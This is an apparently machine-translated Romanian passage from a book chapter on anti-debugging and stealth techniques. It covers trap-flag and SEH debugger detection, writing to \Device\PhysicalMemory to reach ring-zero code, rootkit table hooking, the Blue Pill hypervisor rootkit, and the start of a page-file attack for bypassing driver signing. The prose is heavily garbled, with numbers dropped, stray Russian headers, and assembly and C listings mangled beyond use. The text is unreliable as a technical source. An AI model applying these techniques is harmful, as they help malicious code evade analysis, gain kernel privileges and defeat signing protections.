evenimentelor și se predă imediat ,fără să încerce măcar să lupți Desigur, transferul direct al tehnicilor anti-aterizare de la MS-DOS la Windows esteimposibil, doar dacă nu există „întreruperi” în Windows, în sensul că MS-DOS investește în ele Nu are porturi deintrare/ieșire, memorie fizică și multe alte concepte familiarizate pentru programaștii DOS Aceasta este, desigur, ei(unde fără întreruperi?!), Dar tehnica de a lucra cu ei este radical diferită Astfel, este încă necesară o anumităadaptare Vom pune accentul principal pe nivelul aplicat Unele dintre tehnicile descrise sunt aproape complet sistemiceși dependente și funcționează în cadrul oricărui sistem de operare pe de biți din familia Windows, sprijinind parțialWindows X și Windows XP Edition pe de biți Unii necesită doar Windows NT sau un derivat al sistemului și nu avemgaranții pentru menținerea performanței în versiunile ulterioare ale Windows Chiar dacă utilizați doar funcțiidocumentate, este totuși necesar să rețineți că Microsoft le poate schimba în orice moment, așa cum s -a făcut deja înmod repetat, și recent din ce în ce mai des Este mai bine să nu folosiți deloc funcții dependente de sistem și săscrieți totul pe ANSI C/C ++ sau Delphi Notă De fapt, Delphi este un „sistem de operare” independent, întins deasupra ferestrelor, iar programatorul care abatăcapriciile Microsoft, pur și simplu traversați codul și toate, desigur, se referă doar la sarcini aplicate, iaravantajul indicat al Delphi nu este aplicat Cu toate acestea, se teme Nu au nevoie de tehnici anti-delanding Utilizarea lor este destul de acceptabilă, dacă nu, este de dorit O bună colecție de metode anti -canalizareale timpurilor străvechi poate fi găsită în articolul „Anti debuging Tricks”(http://textriles group lt/programming/Antidbg txt), scris de celebrul virus -scriitor inbar Raz Articolul a fost scrisîn , dar tehnicile descrise în el înșiși au o vârstă mult mai respectabilă Mulți dintre ei au migrat în MS-DOS cuplatforme și mai vechi În această secțiune, se va face o încercare de a le transfera în Windows Un program auto -tratateste una dintre cele mai vechi tehnici bazate pe „absorbția” întreruperii trasatorului de către depanator Luați înconsiderare mai detaliat După cum știți, procesoarele X au un steag special de tracer (Flag Trap, TF) Când estecocoșată, după efectuarea fiecărei instrucțiuni, este generată o întrerupere specială de depanare procesată de debugger(cu excepția cazului în care, desigur, este instalată și depanează cu adevărat programul) În caz contrar, controlerulprimește procesorul implicit În MS-DOS, este un dop „inactiv” constând doar din instrucțiuni IRET, iar programul nu esteîntrerupt Dar Windows excită o excepție care duce la apariția unei casete de dialog bine cunoscute care raportează că„programul a efectuat o operație inacceptabilă și va fi închis” Formal, Flag Flag face parte din registrul de pavilionși, prin urmare, poate fi salvat în stivă de comenzile Pushf/PushFD Cu toate acestea, este probabil ca nu va fi posibilsă recunoaștem faptul de a urmări în acest fel, deoarece mulți debuggeri își maschează prezența Odată cu execuțiapasului de pas, aceștia verifică în plus dacă instrucțiunea Pushf este doar executată și, dacă da, ajustează valoareaRegistrului Partea V Cooperativa practică a steagurilor, aruncând TF la zero Adevărat, aici poți înșela De exemplu, adăugați câteva prefixe inutile înainte de echipa Pushf - atunci va exista șansaca depanatorul să nu le poată recunoaște Puteți utiliza, de asemenea, codul autoemructiv, plasând comanda pushf înstivă, astfel încât valoarea conservată a registrului de pavilion să fie complet ștersă Adevărat, există o micăproblemă Producătorii de hardware și software au recunoscut în sfârșit faptul că nu au putut învăța programatoriprogramatori, iar acum nu va fi posibil Sistemele de operare și aplicațiile sunt literalmente umplute cu erori desupraaglomerare a tamponului prin care sunt distribuiți viermi, programe troiene și alte software rău intenționat Pentrua acoperi lacună, a trebuit să merg la o măsură destul de strictă, controversată și radicală - o stivă neîmplinită Șideși el încă nu va opri răspândirea viermilor, deoarece există și alte tipuri de tampoane copleșitoare, pentru noi(utilizatori și programatori), în termeni practice, acest lucru înseamnă că multe programe vor înceta să funcționeze Înspecial, acestea includ programe protejate de wackers și protectori folosind un cod auto -modificat care se execută înstivă Prin urmare, Microsoft a oferit posibilitatea de a opri protecția La prima încercare de a executa codul pe stivă,Windows XP va arunca o casetă de dialog formidabilă (Fig ) și cu un răspuns afirmativ al utilizatorului, execuțiaunui program securizat va continua, deci nu atât de rău Apoi, ajutați la protejarea computerului, Windows a luat masaacest program Nume: Windows Explorer Publisher: Microsoft Corporation Close Message Prevenirea datelor de execuție ajutăla protejarea daunelor împotriva virușilor și a altor amenințări de securitate Orez Caseta de dialog care apareatunci când încearcă să efectueze codul în stivă, cu toate acestea, debuggerii precum Microsoft Visual C ++ suntopționale, iar codul nesofisticat afișat în lista detectează cu ușurință prezența lor Încercați să -l efectuați înmodul pas -by -pas și vedeți ce se va întâmpla!Pushhf;Păstrăm steagurile în stivă, inclusiv TF ROR EAH;Turnațisteagurile salvate în EAX și EAH, OH;Subliniem steagul Tracer jnz sub debugger;Dacă TF este cocoșat, suntemurmăriți Principalul minus al acestei tehnici este că este foarte ușor să te ocolești Este suficient, de exemplu, doarpentru a se potrivi cursorului la echipa PushHF, dați depanatorului echipa de aici (adică pentru a executa programul înaceastă poziție fără a urmări), apoi ajustați cursorul la comanda JNZ și dați comanda Această tehnologie se numește Prevenirea datelor (prevenirea execuției datelor, DEP) În sistemele de operare Windows XP cu un pachet (SP ) șiMicrosoft Windows Uditos -Tabiet RS , funcția DEP este implementată atât la nivel de software, cât și dehardware Descrierea sa detaliată poate fi găsită aici: http: //support inicrosoft coin/kb/ GPAVA Tehnici anti-deliere și ascundeți și căutați sub Windows și Linux du aici din nou Astfel, fragmentul protejat va fi efectuat înmodul obișnuit, iar prezența debuggerului va fi neobservată De aceea, mulți programatori preferă să salveze registrul depavilion la un moment dat al programului și să -l verifice în altul Acest lucru este confuz hackeri începători, dar nu oputeți face cu experiență La proiectarea Pushf/ROR Re/XXX REG, h au dezvoltat de mult timp un reflex necondiționat,în plus, cracker nu costă nimic de înlocuit și EAH, h cu și EAX, OH, și apoi programul va pierde pentru totdeaunacapacitatea de a recunoaște debuggerul Puteți (și este necesar), desigur, adăugați un test al propriei integrități, dareste puțin probabil ca acesta să întârzie hackerul pentru o lungă perioadă de timp Acum luăm în considerare versiuneaușor modificată a aceleiași protecții care recunoaște prezența debuggerului, indiferent dacă programul este executat înmodul de pas cu pas sau nu Algoritmul de lucru în termeni generali arată astfel: luăm în mod independent steagul de urmăși efectuăm următoarea comandă Procesorul generează în mod ascultător excepția pe care o interceptăm cu o pregătire SEHpreinstalată, transmitând controlul codului nostru Dar dacă există un debugger, excluderea este „absorbită”, iarprocesorul SEH nu mai primește control (listarea ) Listarea Tehnica universală anti -delanding care recunoaștetrasatorul sub majoritatea debuggerilor;Instalăm un nou procesor de excepții structurale ;Numărul registruluiEAX ;Puneți indicatorul într -un nou handler în pahar ;Pune indicatorul pe vechiul handler în pahar ;Înregistrăm o nouăpregătire SEH Eah, eAx offset seh handler dword ptr fs: [eax] fs: [eax], esp push push mov;Luăm steagul Pushf PushfPOPF;Împingem registrul în stivă;Îi împingem conținutul;Luăm steagul TF ;Puneți EAX în stivă ;Îi împingemconținutul;Acum steagul urmelor este cocoșat la Registrul EAX la registrul de pavilion Sub debugger;După ce executareaacestei comenzi este generată;Excepție și dacă debuggerul nu este setat;El este interceptat de pregătirea SEH, care;EIRse ajustează, iar această echipă nu este executată ;Sub depanator există o tranziție la o ramură;Sub debugger ;Codulprincipal al programului ;Seh-tăietor poate fi;(Este mai bine să -l așezi de codul de protecție, astfel încât să nu fieatât de izbitor) Seh handler: Moos Presupun că MOV este localizat oriunde în ESI, [ESP+OCH] ESI: PTR Context [ESI] Regeip, offset continuă;Unde să continue implementarea;În absența unui depanator ;Indicator al contextuluiregistrelor ;Ieșiți din pregătirea SEH Continua:;// De aici va continua controlul dacă debuggerul nu este instalat Partea V Practică Cocompaulus Această tehnică vă permite să detectați Softice și mulți alți debuggeri și nu răspunde ladepanarea pasivă, ceea ce este foarte bun Utilizatorul programului nostru poate rula Softice și depanează restulprogramelor Dar, de îndată ce încearcă să încarce programul nostru în debugger, ea va da imediat un semnal Același lucruse va întâmpla dacă hackerul se alătură debuggerului la un proces deja care rulează sau izbucnește în mijloculprogramului prin instalarea punctelor de oprire pe funcții ari În mod firesc, codul anti -landare nu ar trebui executat,ci după încărcarea debuggerului Adică nu merită să -l plasați chiar la începutul programului protejat Mai bine -duplicat în mod repetat în diverse locuri Frumusețea acestei tehnici este că este dificil să o recunoști atunci cândhacking Nu există verificări evidente, iar comanda JMP Under Debugger arată ca o oaie nevinovată Când este efectuatăfără un depanator, excepția este excitată interceptată de manipulator, iar programul este deja îndeplinit pe o calecomplet diferită Procesorul înlocuiește comenzile comenzilor, deși, cu toate acestea, nu ar fi putut face aceastăîntreruperi nefericite, din care a fost necesar să ieșim cât mai curând posibil în MS-DOS, pentru a nu distrugesistemul, o excepție structurală Procesorul, în principiu, poate conține întregul cod de program este înîntregime Astfel, este complet opțional să manipulezi contextul - de ce să atragi din nou atenția hackerului?În cadruldebuggerului, echipa JMP Under Debugger este realizată „așa cum este”, iar hackerul poate ridica în filiala subsolsub debugger pentru o perioadă foarte lungă de timp, fără să înțeleagă ce se întâmplă aici Pentru a întârzia hack -ul,este mai bine să nu raportați imediat că debuggerul este descoperit, ci să alunecați un cod criptat saualtceva Principalul lucru este că comenzile POPF și JMP sub debugger nu au fost împărțite de orice alte instrucțiuni!În caz contrar, protecția nu va funcționa!Excepția de urmărire estegenerată imediat după prima comandă localizată după POPF, iar dacă se dovedește a fi, de exemplu, pori, atunciinstrucțiunile JMP nu vor mai primi excepții Așadar, pentru a deghiza codul de protecție, deghizarea lui în întregulperimetru operațional, nu va mai reuși În plus, hackerul poate neutraliza cu ușurință protecția prin simpla înlocuire aJMP Under Debugger cu JMP Continuare Pentru a rezista acestui lucru, este necesar să luați un steag special în tăietorulSEH și să îl verificați în cursul programului-fie că a fost numit sau nu Și tipul de excepție este încă în pregătireaSEH în sine, altfel hackerul va adăuga pur și simplu Xor EAX, EAX/TOC [EAH], EAH (Circulation by Zero Index, generareade excepție), iar apoi SEH-Handler va primi managementul Ca sub debugger, așa și fără el Ne punem această întrebare:poate depanatorul să urmărească programul care este deja sub Tracer (de exemplu, este depanat de un alt debugger sau deurmărire) Direct - nu, deoarece există un singur steag de urmărire în procesoarele X , iar atașamentul său nu esteacceptat Pe de altă parte, dacă un debugger mai mare monitorizează circulația pavilionului de urmă și emulează emoțiaîntreruperii trasorului, transmitând controlul nu la următoarea comandă, ci la tăietorul SEH, atunci o astfel de schemăpoate funcționa Adevărat, codul de debugger va deveni semnificativ mai complicat și, deoarece debuggerii comerciali suntconcentrați exclusiv pe programatorii legali care nu se angajează în apărare (sau, în orice caz, preferă să nu facăpublicitate), apoi crearea debuggerului perfect pentru producător este pur și simplu nu este un motiv În ceea ceprivește debuggerii non -profit cu tot respectul față de ei, pentru a obține perfecțiunea, ei tot cresc și cresc Cutoate acestea, emularea depanurilor de depanare poate face față cu ușurință unei astfel de protecții, dar unde ați văzutdebuggerul emulat pentru Windows?Puteți, desigur, să luați un emulator RS cu drepturi depline, cu un debugger integratde tip Bochs , cu toate acestea, este aproape imposibil să depanați o aplicație Windows pe ea, deoarece nu există niciomodalitate de a distinge codul unui proces de altul Programul care se urmărește se realizează incorect sub debuggeri -este urmărit de debugger, dar nu de la sine O idee bună este să agățați un despacker pe un tracer, descifrareaprogramului așa cum este executat Acest lucru complică în mod semnificativ sub care, apropo, există debuggerisuplimentari incluși în textele originale, dar absente în ansamblul binar finalizat GPAVA Tehnici anti -deliere și oascunzătoare și căutați hacking -ul Windows și Linux , făcând adesea aproape imposibil În loc de o verificare clarăsau indirectă pentru debugger, programul va folosi resursele comune cu debuggerul, iar sub debugger devine pur și simpluneoficial Cel mai simplu exemplu de astfel de protecție este prezentat în lista Funcționează doar în cadrul MS-DOS,dar, cu toate acestea, este transferat cu ușurință la Windows În acest scop, procesorul de întrerupere este înlocuit cuun procesor de excludere structurală (așa cum se face acest lucru, a fost prezentat în lista ), iar funcția ARIvirtuală a Protectului este cauzată înainte de decriptare pentru instalarea atributului de înregistrare VersiuneaWMDOWS nu este complicată în implementare, ci prea tunet și, prin urmare, nu este prea clară Listarea Un exemplu decel mai simplu program de auto-trapuri pentru MS-DOS;// Instalați un nou procesor al întreruperii tracerului în OLH MOVAX, H;Funcția H (setați o întrerupere), întrerupere - Olh Lea DX, Newint H;Indicatorul către procesorul deîntrerupere Int b;Funcția de serviciu MS-DOS ;// Luați steagul Tracer Pushhf;Salvăm registrul de pavilion în stivă RORAH;Îl împingem la registrul AH sau ah, ;Luăm bitul TF Împingeți ah;Salvăm registrul schimbat în stivă Popf;Împingemvaloarea modificată în registrul de pavilion // Acum, după executarea fiecărei comenzi, procesorul va genera Int , //Transferul controlului procesorului său // Pregătiți parametrii pentru decodarea Lea Si, Crypted Begin Mov Cyov, (OffsetCrypted end - Crypted Begin) / Repetă :;// Ciclul de transcriere principal LODSW;Citim următorul cuvânt de Si în ah,crescând Si cu Mov [Si- ], Bx;Scriem în celula [eSi- ] conținutul BX Repetare buclă;Răsucim ciclul până când circuleste zero ;Se pare că acesta este un ciclu rău care funcționează ca memset;acestea umplerea zonei de memorie cuconținutul BH;care nici nu a fost inițializat ;Cu toate acestea, totul nu este atât de generat la fiecaremișcare;Controlul de transmitere a întreruperii trasatorului;Inters, care modifică implicit BX ;// Resetați steagulTracer Pushhf;Salvați registrul de pavilion în grămadă Pop dx;Îl împingem către registrul DX;(AH este utilizat de procesorul Int OLH) Și dh, ofeh;Resetați bitulTF împinge dx;Salvăm registrul DX schimbat în stivă Popf;Împingem valoarea modificată în registrul de pavilion ;// oaltă capcană pentru hacker ] Irp to dbg: jrnps Under debugger în mod implicit Text/ code și RoData au un atribut alcitirii - Decodarea directă în ele Partea V Cord -Cord -Capacitate ;„Sarcină utilă” (codul principal alprogramului) New int h: Xor Ax, FADH;Criptăm conținutul registrului AH Mov, ah;Îl plasăm în registru Mov word ptr cs:[jrrp to dbg], h;„Ucide” o tranziție condiționată care duce la o ramură falsă;(În conformitate cu depanatorul,manipulatorul Int Olh nu va primi; controlul și tranziția nu va fi ucisă) ;Părăsim procesorul deîntrerupere Crypted Begin :;Cod/date criptate Crypted end: Pot să -l hack?Pentru a fi sincer, acest exemplu se rupe fărăprea mult stres și cu un efort minim Este suficient să instalați pur și simplu punctul hardware al opririi peCrypted Begin și să așteptați finalizarea despachetării, apoi eliminați groapa și transformați-o într-un fișier EHE,care poate fi deja depanat în mod obișnuit Pentru a se împiedica să înșele, protecția trebuie să folosească mulțidecodificatori investiți sau să lupte cu un mod diferit (de exemplu, să o omoare prin acces la memoria fizică, desprecare vom vorbi în secțiunea următoare Principalul avantaj al tehnicii descrise este că funcționează bine sub toatălinia Windows (atât Windows X, cât și Windows NT) și este puțin probabil ca ceva să se schimbe în versiunileulterioare Exemple anti-aterizare bazate pe accesul la memoria fizică în codul MS-DOS al datelor de depanare și sistem( De exemplu, tabelul vectorilor de întrerupere) se aflau într -un spațiu vizat cu un program depanat, care a deschis undomeniu mare pentru metodele de luptă A fost posibil să scaneze memoria și să omori debuggerul sau să folosești pur șisimplu vectorii debug (INTS și int H) pentru nevoile mecanismului de protecție, punând ceva util acolo (să zicem,acolo, o cheie de decriptare), iar după un timp, considerați -l înapoi Dacă nu există debugger sau este inactiv, atuncidenaturarea ex Vectorii Addici nu încalcă sistemul de operare Dar sub debugger totul va fi diferit Cel mai probabil, vaavea loc o prăbușire totală, deoarece atunci când generați întreruperea tracerului sau atingerea punctului de oprire,controlul va fi transferat către „cosmos” (vectorul este distorsionat!) Dacă debuggerul restabilește cu forța vectorii,atunci în loc de datele salvate, programul securizat nu va mai citi cheia de decriptare, ci ceva completdiferit!Teoretic, pe cele + procesoare, debuggerul poate controla accesul la vectorii de depanare și poate imitaoperațiunile de citire/înregistrare fără a le efectua de fapt Dar acest lucru va necesita două puncte hardware Înacelași timp, există doar patru hardware în procesoarele X în x și acestea nu sunt în permanență suficiente, deci nueste un motiv pentru a le împrăștia Sistemul de operare Windows folosește spații vizate separate și memorie virtuală,ceea ce înseamnă că aplicația depanată nu poate „ajunge” nici la debugger, nici la vectorii de întrerupere Puteți,desigur, să scrieți un șofer (după cum știți, șoferul poate toate GPAV Tehnici anti -deliere și o ascunzătoarepentru Windows și Linux sau aproape totul), dar am vorbit deja despre probleme conexe Șoferii de scriere necesităcalificări ridicate, în plus, datorită dimensiunilor lor minuscule, șoferii sunt foarte ușor de rupt, iar scrierea unuișofer complex este aproape nerealist-„punerea în funcțiune” va lua tot restul vieții sale În sistemele de operare alefamiliei Windows NT există un pseudo -performanță specială, care oferă acces la memoria fizică pentrucitire/înregistrare Aceasta este într -adevăr memorie fizică, chiar înainte de difuzarea virtuală și are tot ce se aflăîn memoria computerului în acest moment Nu există pagini încărcate pe disc în fișierul pompei, dar nu avem nevoie deele Avem nevoie de codul și datele sistemului de operare În prezența drepturilor de administrator, nu numai că putemciti PhysicalMemory, ci și să scriem acolo Da, da!Nu te -ai greșit, iar acesta nu este o dactilografie!De la nivelulaplicat, puteți pătrunde în Sfântul Sfântului Sistem de operare, modificând liber codul executat la nivelul privilegiatal inelului zero (inelul ) La rândul său, aceasta înseamnă că avem de fapt un inel la nivel aplicat (inelul )!Oricedebugger poate fi distrus fără probleme, chiar dacă este un emulator de debugger Excepția este doar mașini virtualeprecum Bochs, dar, așa cum am spus deja, a încerca să depanați o aplicație Windows pe ele nu este serioasă Hackerul seva îneca în fluxuri străine și apeluri de sistem!Cineva se gândește PhysicalMemory cu o gaură teribilă în sistemul de securitate De fapt, aici nu este nimic anormal Dacă hackerul aredrepturile administratorului, el poate încărca în mod liber drivere din care puteți face orice, iar în Windows NTîncărcarea șoferului nu necesită repornire Aceasta înseamnă că prezența pseudo -emomoriei -performanță nu afecteazăsiguranța, dar face ca accesul la memoria fizică să fie mai confortabil și mai convenabil În UNIX (al cărui model desecuritate a fost produs de ani buni) au existat pseudo -decizii /dem și /dev /kmem cu mult timp în urmă, oferind accesla memoria fizică înainte și după difuzare, dar nimeni nu va critica Această funcție este necesară de multe programe desistem și de sistemul de operare în sine Dacă îl eliminați, atunci programatorii vor începe să -și scrie șoferii careoferă acces la memoria fizică, iar atunci va începe o setare completă, deoarece toate tipurile de greșeli nu suntexcluse în astfel de șoferi Dezvoltatorul șoferului poate uita să verifice nivelul privilegiilor și să ofere acces nunumai administratorilor, ci și tuturor utilizatorilor sistemului, ceea ce nu va fi bun Cu toate acestea, Microsoft amers în continuare la un pas destul de controversat, iar în serverul Windows cu serviciul instalat Accesul laPhysicalMemory nu mai are un administrator sau chiar un sistem (a se vedea articolul „Modificări ale funcționalității înMicrosoft Windows Server Service Pack DevicenPhysicalMemory Obiect "на сайте Microsoft:http://www microsoft com/technet/prodtechnol/WindowsServer /Library/BookofSpl/e f A -CFL - A -BEA -F DL CE MSPX) Cu toate acestea, pe toate celelaltesisteme, această tehnică funcționează destul de normal, deci nu o scrieți din conturi Să luăm utilitatea ob^dir dinpachetul Windows NT DDK și să -l pornim cu parametrul \ Device (Vizualizarea dispozitivelor și pseudo -decizii instalateîn sistem) Retragerea acestui utilitar va arăta ceva de genul acesta prezentat în lista $ob:jdir \Device ParailelVdmO ParTechlncO ParTechlncl ParTechInc PfModNT PhysicalMemory PointerClassO Device Device Device Device DeviceSection Device Часть V Практическое кодокопательство Processor ​​​​ Device RasAcd Device RawCdRomDevice Как видите, PhysicalMemory— это не совсем устройство, точнее совсем не устройство ( Dispozitiv) și secțiunea(secația), pentru a lucra cu care trebuie utilizată funcția de ntopensct Un exemplu de cea mai simplă implementare aunui astfel de apel este prezentat în lista Listarea Deschiderea pseudo -performanță fizicmemory // diversevariabile ntstatus nts;Secțiunea mâner;Object attributes obattnbutes;INIT UNICODE (obstnng, l "\\ dispozitiv \\fizicMemory");// inițializarea atributelor inițializateObjectTtTnButes (& OBATTRIBUTES, & OUTSTRING,obj case insensitive | obj kernel handle, null, null);// deschiderea fizicmemory nts = ntopensectionț & secțiune,securitate, hartă "citit | secțiune map write, & obattnbutes);Poate că vom dori să oferim acces la pseudo -depozitelefizicMemory nu numai administratorului, ci și tuturor celorlalți utilizatori Pentru aceasta, este necesar să se schimbedrepturile Desigur, doar administratorul poate face acest lucru, dar atunci toți cei care nu sunt leneși vor avea accesla memoria fizică Multe viruși și rute fac exact asta Se prescriu într -o încărcare a autobuzului (sau, după orice altmod, sunt fixate în sistem) și așteaptă până când utilizatorul cel puțin o dată intră în sistem ca administrator Dupăaceea, virușii schimbă drepturile la PhysicalMemory și apoi lucrează din contul de utilizator Programele legale, înspecial mecanismele de protecție, fac adesea la fel Solicitând încărcarea în numele administratorului doar în faza deinstalare, totuși reușesc să slăbească semnificativ securitatea sistemului în acest timp Ei bine, ce pot spune?Nuinstalați niciodată programe pe un computer în care nu aveți încredere Luați în considerare ce etape este necesar pentrua schimba atributele de acces □ Deschide \ Device \ PhysicalMemery folosind funcția NTOPENCTIE, obținem un descriptor □extragem un descriptor de siguranță din acesta apelând funcția GetSeCuntylnf □ Adăugați drepturile de a citi/scrie pelista de control de acces (ACL) folosind funcția SetentriesinaCL □ Actualizăm descriptorul de siguranță apelândSetSecurityInfo □ Închideți descriptorul returnat de funcția Ntopensct Acum memoria fizică poate fi citită șiînregistrată acolo Pentru a face acest lucru, secțiunea PhysicalMemory trebuie să fie proiectată în spațiul de adresevirtuale, provocând funcția de securitate nativă ARI NTMAPVIEW Listarea arată cum se realizează acestlucru Listarea Proiectarea memoriei fizice pe un spațiu vizat virtual // Secțiunea de gestionare a variabilelor șiargumentelor XXX;// = OxAOOOOOOO) {return(BaseAddress & OxFFFFOOO); return(BaseAddress & OxlFFFFOOO); Часть V Практическое кодокопательство Acestalgoritm poate fi găsit în unele viruși și rootkuts (atunci când îl întâlniți cu DizAssMitting, veți ști ce este), darîn programele legale (în special comercial!) Utilizarea sa este strict inacceptabilă Prin urmare, trebuie să vă scriețișoferul Acest lucru provoacă mmgetphysidrass din modul nucleu sau folosind faptul că adresele din intervalul Sooooooh: EF H sunt transmise fără ambiguitate, introduc un „bug” special în sistemul de operare De fapt, hackerul îșicreează propriul cal de apel în sistem , ceea ce vă permite să provocați funcții nucleare de la nivelul aplicat Notaeste una dintre opțiunile pentru implementarea acestui „bug” este prezentat în menționat anterior menționatanteriorArticolul paramilitar „Joc cu Windows /Dev /(K) mem”, cu toate acestea, nu este lipsit de erori pe mașinilemultiprocesor (care, în special, sunt toate mașinile cu placa de bază Pentium- și tehnologia HyperThread, ca să nu maivorbim O AMD multi-core), sunt posibile „ecranele albastre ale morții”, ceea ce din nou Este inacceptabil acest lucru ca acest aport anti -aterizare să fie complet inutil?Deloc!Dificultățile în crearea unuiprogram de lucru stabil și fiabil bazat pe acesta sunt de natură tehnică și sunt destul de depășite Dacă nu atingețidifuzarea, atunci nu există probleme deloc!Modul în care Win K/XP SDT Restore funcționează cu un bun exemplu deutilizare a accesului la memorie fizică la programele „onest” este utilitatea SDT Restore, a cărei copie poate fidescărcată gratuit de pe http://www security sg/code/sdtrestore html După cum urmează din numele său, este angajat înfaptul că restabilește tabelul de descriere a serviciului (SDT) care conține semne pe apelurile de sistem care pot fiinterceptate de atacator pentru a -și ascunde prezența în sistem Multe rute fac acest lucru Acestea înlocuiesc apelurileoriginale la propriile lor, iar sistemul pierde capacitatea de a detecta fișierele, procesele, conexiunile de rețea,etc De obicei, au apelat la unități de sistem în MS-DOS pentru a combate virușii Stealth, dar acele vremuri au trecutde mult timp Deși Windows, în principiu, pot fi încărcate de pe un disc laser (de exemplu, Windows Re) sau de pe un harddisk suplimentar, această abordare nu este prea convenabilă, doar pentru că necesită repornire și este mai bine să nureporniți serverele Este mai ușor (deși nu este atât de fiabil) să restabiliți SDT prin PhysicalMemory Și deși Rutkinpoate urmări cu ușurință apelul la secțiunea PhysicalMemory (pentru aceasta este suficient pentru el să interceptezefuncția Ntopensct), cele mai dăunătoare programe nu sunt încă implicate în acest sens și, prin urmare, pot fi ușorneutralizate În orice caz, deocamdată Citiți mai multe despre metodele de mascare și luptă din articolul „Hide'n'eek-anatomie a malware-ului Stealth” (http://www blackhat com/bhh-europe- /bh- -radelyi/bhh -eu- -erdlyi-paper pdf) Tehnologiile Stealth în Windows World Îmbunătățirea tehnologiilor Stealth, în cele din urmă (la mijloculanului ), a dus la crearea unui tip fundamental nou, care este aproape imposibil de detectat, și cu atât mai mult săse oprească Merită doar computerul pentru a înghiți „pilula albastră” astfel -numită, în timp ce sistemul de operare searuncă într -o lume virtuală, controlată complet de Rutkin Prima, reală, lumea încetează să mai existe Pentru a -lvedea, este necesar să înghiți „pastila roșie”, crearea căreia cele mai bune minți de hackeri sunt bătute, dar încă nuprea reușesc GPAVA Tehnici anti -deliere și ascundeți și căutați sub Windows și Linux Blue Pilyulyași Red Pilyulya - Windows intră în matrice chiar înainte ca Windows Vista/Server Longhorn , la Syscan Conference(Singapore) și două săptămâni mai târziu, pălărie neagră ( august, SUA, Las Vegas), unde a demonstrat o nouă generațieRutkit, numită „Blue Pili” („Blue Pill”) - o Clear Curtsy spre „matricea” Reacția reprezentanților Microsoft a fostsurprinzător de calmă: gândește -te, a rupt Beto!Nimeni nu a susținut că este imposibil să hack Vista/Longhorn!Există unproces normal de „rulare” a sistemului și cu cât vor fi detectate mai multe erori în etapa de testare beta, cu atât vorfi mai puțin în versiunea finală a produsului Cu toate acestea, Vista RC , lansată două luni mai târziu, nu a suferitnicio modificare și a rămas totuși vulnerabil Microsoft a analizat situația și, în loc să elimine gaura, s -a prefăcutcă nu există nicio gaură aici!(Consultați performanța unuia dintre angajații Microsoft:http://blogs msdn com/windowsvistasecurity/aarchive/ / / / aspx ) Ca, cu drepturile administratorului (și„Blue Blue Pilula „De asemenea, le cere) Acest lucru nu este posibil!Și ce este, de fapt, cu ei, este posibil?!Pentru adescărca un șofer nesemnat sau, în orice alt mod legal, pentru a pătrunde la nivelul nucleului - este imposibil, ceea ceprovoacă multe probleme atât pentru administratori, cât și pentru dezvoltatori înșiși În numele Majestății Sale,securitatea ar fi putut să se înțeleagă cu acest lucru dacă Microsoft a închis cu adevărat toate lacunele În stareaactuală a lucrurilor, se dovedește că suntem obligați să aplicăm o parte din libertățile și facilitățile, oferind însubstituții nimic!Unde este logica?!Pilula albastră „Blue Pilyulya” se bazează pe două concepte principale care sebazează pe semnătura digitală a șoferilor (obligatoriu în birourile editoriale ale Windows X - , începând cu WindowsVista Build ) și instalarea unui hipervisor (hipervisor), Utilizarea tehnologiei de virtualizare hardware a AMDPacifica, care vă permit să rulați sistemul de operare pe un emulator care controlează toate evenimentele„interesante” În aproximare aproximativă, acest lucru poate fi ilustrat prin exemplul procesorului , care mențineregimul „Virtual ” (aka V ), care asigură funcționarea simultană a mai multor sesiuni MS-DOS Până în prezent, a apărutmodul „Virtual +”, iar Hypervisor proiectat corect nu permite sistemului de oaspeți să stabilească dacă esteefectuat sau nu pe un procesor „viu” Tehnologia pentru ocolirea semnăturii digitale a șoferilor este relevantă numaipentru versiunile de de biți ale Windows (în versiunile pe de biți, puteți descărca un driver nesemnat și în acestfel), iar mecanismele virtualizării hardware nu sunt în niciun fel legate de sistemul de operare specific șifuncționează remarcabil pe Linux, BSD, Mac OS, etc D Orice sistem de operare care permite hackerului să se rupă lanivelul nucleului poate fi atacat Astfel, „pilula albastră” este formată din două componente, doar una dintre ele fiindcu adevărat „albastră” Este și este responsabil de scufundarea sistemului de operare într -o lume virtuală O altăcomponentă este o „sămânță” independentă, special concepută pentru ocolirea protecției versiunilor pe de biți deferestre și turnare (mai precis, dumping) la nivelul nuclear orice sarcină utilă, care poate acționa ca rootkitobișnuit Textul prezentării cu care Jeanne Rutkovskaya a interpretat la Conferința Black Hat, precum și multe altemateriale și utilități utile pot fi găsite pe site -ul ei: http://www invisibles org De asemenea, numit MonitorulVirtual Machine, VMM) Monitorul Desigur, cu suportul procesorului Partea V Codicopaging practic, ocolireasemnăturii digitale, ocolirea semnăturii digitale, se bazează pe modificarea fișierului de pompare la nivelul sectorului(îl numim atac de fișiere de pagină) Atacul în sine este format din șase etape: Găsim un driver rar folosit (deexemplu, null sys) în catalog/sistem /drivere), citiți conținutul acestuia și selectați o secvență unică de octeți(semnătură), care vă permite să vă permiteți Identificați fără echivoc Semnătura ar trebui să se afle înIRP MJ DEVICE CONTROL ramură Devicedispatcher, a cărei adresă este ușor de determinat prin DizAssMitting Driver Înacelași timp, semnătura nu are dreptul de a traversa limitele paginii , cu alte cuvinte, condiția trebuie îndeplinită:(virtual address of signature % looh) + sizeof (virtual address of signature) // Deasemenea, conectăm SMP LOCK pe mașini multiprocesor #Ifdef SMP #include #Endif // FuncțieFuncție la încărcarea modulului, Intinit Module (void) {// Înclin!Am intrat în modul nucleu // Și acum putem faceorice!// meow ceva, printk ("\ nwow! Modulul nostru a fost încărcat! \ N");// inițializarea de succes Return ( );) //Funcția efectuată la descărcarea modulului Void Cleanup Module (void) {// We Meow ceva Printk ("\ ndeuce ia -l! Modululnostru a fost descărcat \ n");// sperie licența conform căreia este distribuită // acest fișier Dacă acest lucru nu seface, modulul are succes // încărcături, dar sistemul de operare va da avertisment, // a spus în jurnalele și atrageatenția administratorilor Module license ("gpl");Începând cu versiunea , au apărut modificări semnificative înnucleu, iar acum trebuie să programați așa cum se arată în lista ;ЛистингЗб&Сю^піюстеЙш^м^ #ifdef LINUX staticint init my init() #else int init module Часть V Практическое кодокопательство #endif #ifdef LINUX static void exit my cleanup() #else int cleanup module() # endif #ifdef LINUX module init( My init);module exit(my cleanup);#Deif Pentru detalii, contactați sistemul de referință (modulul man -k), documentația oficială(/usr/src/linux/documentație/module Txt), precum și resurse de internet, a căror listă este dată la sfârșitul acestuilucru secțiune Fie că este posibil, modulul scris trebuie să fie compilat: gcc -cc- my module c -o my moulela o (esterecomandat să utilizați optimizarea adăugând cheia - sau -oz), apoi încărcați Core: Insmod Tu Module O Doarutilizatorul rădăcină poate 